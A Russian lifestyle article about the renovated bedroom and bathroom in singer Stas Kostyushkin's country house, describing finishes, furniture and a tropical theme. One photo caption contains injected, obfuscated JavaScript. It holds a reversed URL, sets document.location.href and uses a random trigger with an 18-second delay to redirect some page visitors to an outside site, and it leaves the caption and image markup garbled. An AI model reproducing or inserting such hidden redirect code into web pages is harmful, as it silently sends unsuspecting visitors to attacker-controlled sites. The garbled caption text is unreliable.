Добавить в закладки

Тропическая романтика в спальне Стаса Костюшкина

Известный певец Стас Костюшкин, начавший музыкальную карьеру в дуэте «Чай вдвоем», несколько лет назад переехал вместе с семьей в загородный дом. Двухэтажное здание было куплено с уже сделанным ремонтом. Спустя время интерьер приелся хозяевам и на помощь была призвана телепрограмма «Идеальный ремонт». Мастерам поручили переделку спальни и санузла, который из раздельного должен был превратиться в общий.

Стас Костюшкин

Стас Костюшкин. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torage/06/2c/4e8acdbd79494647b44665522c06.jpg»>img07.rl0.ru

Отделка спальни

Для обработки стен было применены серые настенные покрытия, а также зеркала с узорами в виде пальмовых листьев. Потолок обработали белой краской, оклеили широким плинтусом. На полу выложили ламинат насыщенного орехового цвета, сверху раскинули ковер цвета беж, а к потолку прикрепили небольшие светильники.

Фрагмент спальни

Фрагмент спальни. Фото: ampir.ru

Шторы скомбинированы из кофейного и молочного оттенка, тюли белоснежные. Украшают комнату разнообразные горшки с листовыми растениями, пара подсвечиваемых картин, развешенных неподалеку от кровати.

Фрагмент спальни

Фрагмент спальни. Фото: ampir.ru

Мебель

Рядом со входной дверью установлен большой шкаф без фурнитуры, на три отделения. С другой стороны установлен стильный комод в похожей шкафу стилистике, как и тумбы, расставленные по двум сторонам двуспальной кровати.

Фрагмент спальни

Фрагмент спальни. Фото: ampir.ru

На них установлены ночники с необычными стеклянными основаниями. Ложе ограждено хромированной конструкцией для балдахина, в которую вмонтировано фактурное мягкое изголовье. Изюминкой комнаты стало подвесное кресло-гамак.

Кресло-гамак в спальне

Кресло-гамак в спальне. Фото: ampir.ru

Санузел

Тропическая тематика продолжается в уборной комнате. Зеркальные вставки размещены в разных ее уголках.

Фрагмент уборной комнаты

Фрагмент уборной комнаты. Фото: ampir.ru

Здесь можно принять душ, стоя за остекленной кабиной или привести себя в порядок за туалетным столиком, сделанным из серого камня.

Фрагмент уборной комнаты

Фрагмент уборной комнаты. Фото: ampir.ru

После ремонта комнаты полностью преобразились, поменяли стиль. Новый интерьер очень понравился счастливым хозяевам прекрасного дома.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 20.08.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: